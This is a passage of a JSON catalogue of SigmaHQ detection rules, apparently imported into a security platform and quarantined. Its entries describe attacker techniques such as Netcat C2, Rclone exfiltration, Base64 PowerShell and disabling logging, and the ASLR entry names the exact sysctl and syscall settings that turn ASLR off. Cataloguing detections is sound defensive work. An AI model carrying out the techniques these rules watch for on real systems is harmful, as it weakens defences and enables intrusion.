"sigmahq-sigma-e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "type": "detection", "name": "Compress Data and Lock With Password for Exfiltration With WINZIP", "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/compress-data-and-lock-with-password-for-exfiltration-with-winzip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winzip_password_compression.yml" } }, { "id": "sigmahq-sigma-e2f17c5d-b02a-442b-9052-6eb89c9fec9c", "type": "detection", "name": "Screen Capture with Xwd", "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screen-capture-with-xwd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_screencaputre_xwd.yml" } }, { "id": "sigmahq-sigma-e2feb918-4e77-4608-9697-990a1aaf74c3", "type": "detection", "name": "Google Cloud Storage Buckets Enumeration", "description": "Detects when storage bucket is enumerated in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-storage-buckets-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e2feb918-4e77-4608-9697-990a1aaf74c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_bucket_enumeration.yml" } }, { "id": "sigmahq-sigma-e30de276-68ec-435c-ab99-ef3befec6c61", "type": "detection", "name": "OpenCanary - SIP Request", "description": "Detects instances where an SIP service on an OpenCanary node has had a SIP request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-sip-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e30de276-68ec-435c-ab99-ef3befec6c61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_sip_request.yml" } }, { "id": "sigmahq-sigma-e31033fc-33f0-4020-9a16-faf9b31cbf08", "type": "detection", "name": "PUA - Netcat Suspicious Execution", "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1095" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-netcat-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_netcat.yml" } }, { "id": "sigmahq-sigma-e312efd0-35a1-407f-8439-b8d434b438a6", "type": "detection", "name": "Potential PowerShell Obfuscation Via WCHAR/CHAR", "description": "Detects suspicious encoded character syntax often used for defense evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-obfuscation-via-wchar-char.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e312efd0-35a1-407f-8439-b8d434b438a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml" } }, { "id": "sigmahq-sigma-e31bae15-83ed-473e-bf31-faf4f8a17d36", "type": "detection", "name": "New Kubernetes Service Account Created", "description": "Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-kubernetes-service-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e31bae15-83ed-473e-bf31-faf4f8a17d36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml" } }, { "id": "sigmahq-sigma-e32d4572-9826-4738-b651-95fa63747e8a", "type": "detection", "name": "Base64 Encoded PowerShell Command Detected", "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1140", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/base64-encoded-powershell-command-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e32d4572-9826-4738-b651-95fa63747e8a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml" } }, { "id": "sigmahq-sigma-e32f92d1-523e-49c3-9374-bdb13b46a3ba", "type": "detection", "name": "Suspicious Mshta.EXE Execution Patterns", "description": "Detects suspicious mshta process execution patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-mshta-exe-execution-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml" } }, { "id": "sigmahq-sigma-e3393cba-31f0-4207-831e-aef90ab17a8c", "type": "detection", "name": "SAML Token Issuer Anomaly", "description": "Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1606" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/saml-token-issuer-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3393cba-31f0-4207-831e-aef90ab17a8c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_token_issuer_anomaly.yml" } }, { "id": "sigmahq-sigma-e34cfa0c-0a50-4210-9cb3-5632d08eb041", "type": "detection", "name": "Potential GobRAT File Discovery Via Grep", "description": "Detects the use of grep to discover specific files created by the GobRAT malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-gobrat-file-discovery-via-grep.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e34cfa0c-0a50-4210-9cb3-5632d08eb041", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml" } }, { "id": "sigmahq-sigma-e36941d0-c0f0-443f-bc6f-cb2952eb69ea", "type": "detection", "name": "PowerShell Module File Created", "description": "Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-module-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e36941d0-c0f0-443f-bc6f-cb2952eb69ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_module_creation.yml" } }, { "id": "sigmahq-sigma-e37db05d-d1f9-49c8-b464-cee1a4b11638", "type": "detection", "name": "PUA - Rclone Execution", "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-rclone-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml" } }, { "id": "sigmahq-sigma-e3818659-5016-4811-a73c-dde4679169d2", "type": "detection", "name": "Suspicious Computer Machine Password by PowerShell", "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-computer-machine-password-by-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3818659-5016-4811-a73c-dde4679169d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" } }, { "id": "sigmahq-sigma-e3845023-ca9a-4024-b2b2-5422156d5527", "type": "detection", "name": "PowerShell Module File Created By Non-PowerShell Process", "description": "Detects the creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc. by a non-PowerShell process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-module-file-created-by-non-powershell-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3845023-ca9a-4024-b2b2-5422156d5527", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml" } }, { "id": "sigmahq-sigma-e386b9b5-af12-450e-afff-761730fb8a98", "type": "detection", "name": "AWS VPC Flow Logs Deleted", "description": "Detects the deletion of one or more VPC Flow Logs in AWS Elastic Compute Cloud (EC2) through the DeleteFlowLogs API call.\nAdversaries may delete flow logs to evade detection or remove evidence of network activity, hindering forensic investigations and visibility into malicious operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-vpc-flow-logs-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e386b9b5-af12-450e-afff-761730fb8a98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_vpc_flow_logs_deleted.yml" } }, { "id": "sigmahq-sigma-e3a8a052-111f-4606-9aee-f28ebeb76776", "type": "detection", "name": "Disabling Security Tools", "description": "Detects disabling security tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabling-security-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3a8a052-111f-4606-9aee-f28ebeb76776", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" } }, { "id": "sigmahq-sigma-e3b50fa5-3c3f-444e-937b-0a99d33731cd", "type": "detection", "name": "Outlook Macro Execution Without Warning Setting Enabled", "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outlook-macro-execution-without-warning-setting-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml" } }, { "id": "sigmahq-sigma-e3f673b3-65d1-4d80-9146-466f8b63fa99", "type": "detection", "name": "Suspicious Appended Extension", "description": "Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-appended-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_rename/file_rename_win_ransomware.yml" } }, { "id": "sigmahq-sigma-e3fdf743-f05b-4051-990a-b66919be1743", "type": "detection", "name": "Change User Account Associated with the FAX Service", "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-user-account-associated-with-the-fax-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3fdf743-f05b-4051-990a-b66919be1743", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" } }, { "id": "sigmahq-sigma-e402c26a-267a-45bd-9615-bd9ceda6da85", "type": "detection", "name": "Stale Accounts In A Privileged Role", "description": "Identifies when an account hasn't signed in during the past n number of days.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/stale-accounts-in-a-privileged-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e402c26a-267a-45bd-9615-bd9ceda6da85", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml" } }, { "id": "sigmahq-sigma-e40f4962-b02b-4192-9bfe-245f7ece1f99", "type": "detection", "name": "Multifactor Authentication Denied", "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/multifactor-authentication-denied.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e40f4962-b02b-4192-9bfe-245f7ece1f99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_mfa_denies.yml" } }, { "id": "sigmahq-sigma-e4903324-1a10-4ed3-981b-f6fe3be3a2c2", "type": "detection", "name": "Potential Edputil.DLL Sideloading", "description": "Detects potential DLL sideloading of \"edputil.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-edputil-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4903324-1a10-4ed3-981b-f6fe3be3a2c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_edputil.yml" } }, { "id": "sigmahq-sigma-e497a24e-9345-4a62-9803-b06d7d7cb132", "type": "detection", "name": "ASLR Disabled Via Sysctl or Direct Syscall - Linux", "description": "Detects actions that disable Address Space Layout Randomization (ASLR) in Linux, including:\n - Use of the `personality` syscall with the ADDR_NO_RANDOMIZE flag (0x0040000)\n - Modification of the /proc/sys/kernel/randomize_va_space file\n - Execution of the `sysctl` command to set `kernel.randomize_va_space=0`\nDisabling ASLR is often used by attackers during exploit development or to bypass memory protection mechanisms.\nA successful use of these methods can reduce the effectiveness of ASLR and make memory corruption attacks more reliable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1055.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aslr-disabled-via-sysctl-or-direct-syscall-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e497a24e-9345-4a62-9803-b06d7d7cb132", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_disable_aslr_protection.yml" } }, { "id": "sigmahq-sigma-e49b5745-1064-4ac1-9a2e-f687bc2dd37e", "type": "detection", "name": "Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE", "description": "Detects potential DLL sideloading of \"libcurl.dll\" by the \"gup.exe\" process from an uncommon location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-libcurl-dll-via-gup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e49b5745-1064-4ac1-9a2e-f687bc2dd37e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_gup_libcurl.yml" } }, { "id": "sigmahq-sigma-e4a6b256-3e47-40fc-89d2-7a477edd6915", "type": "detection", "name": "System File Execution Location Anomaly", "description": "Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-file-execution-location-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml" } }, { "id": "sigmahq-sigma-e4a74e34-ecde-4aab-b2fb-9112dd01aed0", "type": "detection", "name": "Dynamic CSharp Compile Artefact", "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dynamic-csharp-compile-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" } }, { "id": "sigmahq-sigma-e4be5675-4a53-426a-8c81-a8bb2387e947", "type": "detection", "name": "CodeIntegrity - Blocked Image/Driver Load For Policy Violation", "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-blocked-image-driver-load-for-policy-violation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4be5675-4a53-426a-8c81-a8bb2387e947", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml" } }, { "id": "sigmahq-sigma-e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4", "type": "detection", "name": "Potentially Suspicious ODBC Driver Registered", "description": "Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-odbc-driver-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_odbc_driver_registered_susp.yml" } }, { "id": "sigmahq-sigma-e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "type": "detection", "name": "Disable Windows IIS HTTP Logging", "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-iis-http-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_http_logging.yml" } }, { "id": "sigmahq-sigma-e4f93c99-396f-47c8-bb0f-201b1fa69034", "type": "detection", "name": "Potential Data Exfiltration Via Audio File", "description": "Detects potential exfiltration attempt via audio file using PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-data-exfiltration-via-audio-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", "source_commit": "df5c6a6", "license": "DRL-1.1", 